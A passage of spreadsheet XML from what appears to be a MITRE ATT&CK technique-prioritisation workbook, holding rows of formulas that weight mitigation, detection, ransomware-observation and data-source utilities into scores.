      <c r="U425" s="57"/>
      <c r="V425" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="W425" s="37">
        <v>0</v>
      </c>
      <c r="X425" s="37">
        <v>0</v>
      </c>
      <c r="Y425" s="37">
        <v>0</v>
      </c>
      <c r="Z425" s="37">
        <v>30</v>
      </c>
      <c r="AA425" s="37">
        <v>0.3</v>
      </c>
      <c r="AB425" s="37">
        <v>0.3</v>
      </c>
      <c r="AC425" s="37"/>
      <c r="AD425" s="50" t="s">
        <v>1151</v>
      </c>
      <c r="AE425" s="37" t="str" cm="1">
        <f t="array" ref="AE425">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD425)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF425" s="37">
        <v>421</v>
      </c>
      <c r="AG425" s="37" t="str" cm="1">
        <f t="array" ref="AG425">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD425)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH425" s="37">
        <v>421</v>
      </c>
      <c r="AI425" s="37" t="str" cm="1">
        <f t="array" ref="AI425">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD425)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ425" s="37">
        <v>421</v>
      </c>
      <c r="AK425" s="37" t="str" cm="1">
        <f t="array" ref="AK425">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD425)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL425" s="37">
        <v>421</v>
      </c>
      <c r="AM425" s="37" t="str" cm="1">
        <f t="array" ref="AM425">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD425)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN425" s="37">
        <v>0</v>
      </c>
      <c r="AO425" s="37"/>
      <c r="AP425" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ425" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>698.07142857142856</v>
      </c>
      <c r="AR425" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS425" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT425" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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26" spans="1:47" ht="51">
      <c r="A426" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B426" s="37">
        <f t="shared" si="6"/>
        <v>937.25618028571432</v>
      </c>
      <c r="C426" s="37" t="s">
        <v>1495</v>
      </c>
      <c r="D426" s="50" t="s">
        <v>1496</v>
      </c>
      <c r="E426" s="37"/>
      <c r="F426" s="37">
        <v>2</v>
      </c>
      <c r="G426" s="37">
        <v>3</v>
      </c>
      <c r="H426" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I426" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J426" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K426" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L426" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M426" s="37">
        <v>4.9179999999999996E-3</v>
      </c>
      <c r="N426" s="56">
        <v>0</v>
      </c>
      <c r="O426" s="56">
        <v>0</v>
      </c>
      <c r="P426" s="56">
        <v>0</v>
      </c>
      <c r="Q426" s="56">
        <v>1</v>
      </c>
      <c r="R426" s="57" t="s">
        <v>1497</v>
      </c>
      <c r="S426" s="57">
        <v>12</v>
      </c>
      <c r="T426" s="57" t="s">
        <v>1498</v>
      </c>
      <c r="U426" s="57">
        <v>19</v>
      </c>
      <c r="V426" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.29999980952380956</v>
      </c>
      <c r="W426" s="37">
        <v>31</v>
      </c>
      <c r="X426" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Y426" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Z426" s="37">
        <v>1</v>
      </c>
      <c r="AA426" s="37">
        <v>0.01</v>
      </c>
      <c r="AB426" s="37">
        <v>0.01</v>
      </c>
      <c r="AC426" s="37"/>
      <c r="AD426" s="50" t="s">
        <v>1499</v>
      </c>
      <c r="AE426" s="37" t="str" cm="1">
        <f t="array" ref="AE426">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD426)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF426" s="37">
        <v>422</v>
      </c>
      <c r="AG426" s="37" t="str" cm="1">
        <f t="array" ref="AG426">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD426)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH426" s="37">
        <v>422</v>
      </c>
      <c r="AI426" s="37" t="str" cm="1">
        <f t="array" ref="AI426">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD426)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ426" s="37">
        <v>422</v>
      </c>
      <c r="AK426" s="37" t="str" cm="1">
        <f t="array" ref="AK426">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD426)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL426" s="37">
        <v>422</v>
      </c>
      <c r="AM426" s="37" t="str" cm="1">
        <f t="array" ref="AM426">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD426)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN426" s="37">
        <v>0</v>
      </c>
      <c r="AO426" s="37">
        <v>0</v>
      </c>
      <c r="AP426" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ426" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>312.41872676190479</v>
      </c>
      <c r="AR426" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS426" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT426" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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27" spans="1:47" ht="34">
      <c r="A427" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B427" s="37">
        <f t="shared" si="6"/>
        <v>459.52881328571431</v>
      </c>
      <c r="C427" s="37" t="s">
        <v>1500</v>
      </c>
      <c r="D427" s="50" t="s">
        <v>1496</v>
      </c>
      <c r="E427" s="37" t="s">
        <v>1501</v>
      </c>
      <c r="F427" s="37">
        <v>1</v>
      </c>
      <c r="G427" s="37">
        <v>1</v>
      </c>
      <c r="H427" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I427" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J427" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K427" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L427" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M427" s="37">
        <v>0</v>
      </c>
      <c r="N427" s="56">
        <v>0</v>
      </c>
      <c r="O427" s="56">
        <v>0</v>
      </c>
      <c r="P427" s="56">
        <v>0</v>
      </c>
      <c r="Q427" s="56">
        <v>0</v>
      </c>
      <c r="R427" s="57" t="s">
        <v>1033</v>
      </c>
      <c r="S427" s="57">
        <v>9</v>
      </c>
      <c r="T427" s="57" t="s">
        <v>1502</v>
      </c>
      <c r="U427" s="57">
        <v>9</v>
      </c>
      <c r="V427" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.1714287142857143</v>
      </c>
      <c r="W427" s="37">
        <v>18</v>
      </c>
      <c r="X427" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y427" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z427" s="37">
        <v>0</v>
      </c>
      <c r="AA427" s="37">
        <v>0</v>
      </c>
      <c r="AB427" s="37">
        <v>0</v>
      </c>
      <c r="AC427" s="37"/>
      <c r="AD427" s="50" t="s">
        <v>1503</v>
      </c>
      <c r="AE427" s="37" t="str" cm="1">
        <f t="array" ref="AE427">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD427)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF427" s="37">
        <v>423</v>
      </c>
      <c r="AG427" s="37" t="str" cm="1">
        <f t="array" ref="AG427">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD427)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH427" s="37">
        <v>423</v>
      </c>
      <c r="AI427" s="37" t="str" cm="1">
        <f t="array" ref="AI427">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD427)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ427" s="37">
        <v>423</v>
      </c>
      <c r="AK427" s="37" t="str" cm="1">
        <f t="array" ref="AK427">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD427)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL427" s="37">
        <v>423</v>
      </c>
      <c r="AM427" s="37" t="str" cm="1">
        <f t="array" ref="AM427">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD427)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN427" s="37">
        <v>0</v>
      </c>
      <c r="AO427" s="37">
        <v>0</v>
      </c>
      <c r="AP427" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ427" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>153.17627109523809</v>
      </c>
      <c r="AR427" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS427" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT427" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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28" spans="1:47" ht="34">
      <c r="A428" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B428" s="37">
        <f t="shared" si="6"/>
        <v>767.69039538095228</v>
      </c>
      <c r="C428" s="37" t="s">
        <v>1504</v>
      </c>
      <c r="D428" s="50" t="s">
        <v>1496</v>
      </c>
      <c r="E428" s="37" t="s">
        <v>1505</v>
      </c>
      <c r="F428" s="37">
        <v>1</v>
      </c>
      <c r="G428" s="37">
        <v>1</v>
      </c>
      <c r="H428" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I428" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J428" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K428" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L428" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M428" s="37">
        <v>0</v>
      </c>
      <c r="N428" s="56">
        <v>0</v>
      </c>
      <c r="O428" s="56">
        <v>11</v>
      </c>
      <c r="P428" s="56">
        <v>1</v>
      </c>
      <c r="Q428" s="56">
        <v>8</v>
      </c>
      <c r="R428" s="57" t="s">
        <v>1506</v>
      </c>
      <c r="S428" s="57">
        <v>8</v>
      </c>
      <c r="T428" s="57" t="s">
        <v>1498</v>
      </c>
      <c r="U428" s="57">
        <v>19</v>
      </c>
      <c r="V428" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.35238090476190476</v>
      </c>
      <c r="W428" s="37">
        <v>27</v>
      </c>
      <c r="X428" s="37">
        <v>0.49090899999999998</v>
      </c>
      <c r="Y428" s="37">
        <v>0.49090899999999998</v>
      </c>
      <c r="Z428" s="37">
        <v>20</v>
      </c>
      <c r="AA428" s="37">
        <v>0.2</v>
      </c>
      <c r="AB428" s="37">
        <v>0.2</v>
      </c>
      <c r="AC428" s="37"/>
      <c r="AD428" s="50" t="s">
        <v>1507</v>
      </c>
      <c r="AE428" s="37" t="str" cm="1">
        <f t="array" ref="AE428">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD428)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF428" s="37">
        <v>424</v>
      </c>
      <c r="AG428" s="37" t="str" cm="1">
        <f t="array" ref="AG428">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD428)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH428" s="37">
        <v>424</v>
      </c>
      <c r="AI428" s="37" t="str" cm="1">
        <f t="array" ref="AI428">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD428)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ428" s="37">
        <v>424</v>
      </c>
      <c r="AK428" s="37" t="str" cm="1">
        <f t="array" ref="AK428">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD428)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL428" s="37">
        <v>424</v>
      </c>
      <c r="AM428" s="37" t="str" cm="1">
        <f t="array" ref="AM428">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD428)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN428" s="37">
        <v>0</v>
      </c>
      <c r="AO428" s="37">
        <v>0</v>
      </c>
      <c r="AP428" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ428" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>255.89679846031743</v>
      </c>
      <c r="AR428" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS428" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT428" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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29" spans="1:47" ht="34">
      <c r="A429" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B429" s="37">
        <f t="shared" si="6"/>
        <v>664.19991899999991</v>
      </c>
      <c r="C429" s="37" t="s">
        <v>1508</v>
      </c>
      <c r="D429" s="50" t="s">
        <v>1496</v>
      </c>
      <c r="E429" s="37" t="s">
        <v>1509</v>
      </c>
      <c r="F429" s="37">
        <v>1</v>
      </c>
      <c r="G429" s="37">
        <v>1</v>
      </c>
      <c r="H429" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I429" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J429" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K429" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L429" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M429" s="37">
        <v>0</v>
      </c>
      <c r="N429" s="56">
        <v>0</v>
      </c>
      <c r="O429" s="56">
        <v>0</v>
      </c>
      <c r="P429" s="56">
        <v>0</v>
      </c>
      <c r="Q429" s="56">
        <v>7</v>
      </c>
      <c r="R429" s="57" t="s">
        <v>1506</v>
      </c>
      <c r="S429" s="57">
        <v>8</v>
      </c>
      <c r="T429" s="57" t="s">
        <v>1498</v>
      </c>
      <c r="U429" s="57">
        <v>19</v>
      </c>
      <c r="V429" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.29047614285714285</v>
      </c>
      <c r="W429" s="37">
        <v>27</v>
      </c>
      <c r="X429" s="37">
        <v>0.49090899999999998</v>
      </c>
      <c r="Y429" s="37">
        <v>0.49090899999999998</v>
      </c>
      <c r="Z429" s="37">
        <v>7</v>
      </c>
      <c r="AA429" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB429" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC429" s="37"/>
      <c r="AD429" s="50" t="s">
        <v>1510</v>
      </c>
      <c r="AE429" s="37" t="str" cm="1">
        <f t="array" ref="AE429">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD429)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF429" s="37">
        <v>425</v>
      </c>
      <c r="AG429" s="37" t="str" cm="1">
        <f t="array" ref="AG429">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD429)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH429" s="37">
        <v>425</v>
      </c>
      <c r="AI429" s="37" t="str" cm="1">
        <f t="array" ref="AI429">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD429)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ429" s="37">
        <v>425</v>
      </c>
      <c r="AK429" s="37" t="str" cm="1">
        <f t="array" ref="AK429">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD429)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL429" s="37">
        <v>425</v>
      </c>
      <c r="AM429" s="37" t="str" cm="1">
        <f t="array" ref="AM429">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD429)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN429" s="37">
        <v>0</v>
      </c>
      <c r="AO429" s="37">
        <v>0</v>
      </c>
      <c r="AP429" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ429" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>221.39997299999996</v>
      </c>
      <c r="AR429" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS429" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT429" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU42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30" spans="1:47" ht="34">
      <c r="A430" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B430" s="37">
        <f t="shared" si="6"/>
        <v>617.0473754761905</v>
      </c>
      <c r="C430" s="37" t="s">
        <v>1511</v>
      </c>
      <c r="D430" s="50" t="s">
        <v>1496</v>
      </c>
      <c r="E430" s="37" t="s">
        <v>1512</v>
      </c>
      <c r="F430" s="37">
        <v>1</v>
      </c>
      <c r="G430" s="37">
        <v>1</v>
      </c>
      <c r="H430" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I430" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J430" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K430" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L430" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M430" s="37">
        <v>0</v>
      </c>
      <c r="N430" s="56">
        <v>0</v>
      </c>
      <c r="O430" s="56">
        <v>1</v>
      </c>
      <c r="P430" s="56">
        <v>2</v>
      </c>
      <c r="Q430" s="56">
        <v>0</v>
      </c>
      <c r="R430" s="57" t="s">
        <v>1513</v>
      </c>
      <c r="S430" s="57">
        <v>6</v>
      </c>
      <c r="T430" s="57" t="s">
        <v>1514</v>
      </c>
      <c r="U430" s="57">
        <v>20</v>
      </c>
      <c r="V430" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.26190461904761908</v>
      </c>
      <c r="W430" s="37">
        <v>26</v>
      </c>
      <c r="X430" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Y430" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Z430" s="37">
        <v>3</v>
      </c>
      <c r="AA430" s="37">
        <v>0.03</v>
      </c>
      <c r="AB430" s="37">
        <v>0.03</v>
      </c>
      <c r="AC430" s="37"/>
      <c r="AD430" s="50" t="s">
        <v>1510</v>
      </c>
      <c r="AE430" s="37" t="str" cm="1">
        <f t="array" ref="AE430">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD430)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF430" s="37">
        <v>426</v>
      </c>
      <c r="AG430" s="37" t="str" cm="1">
        <f t="array" ref="AG430">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD430)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH430" s="37">
        <v>426</v>
      </c>
      <c r="AI430" s="37" t="str" cm="1">
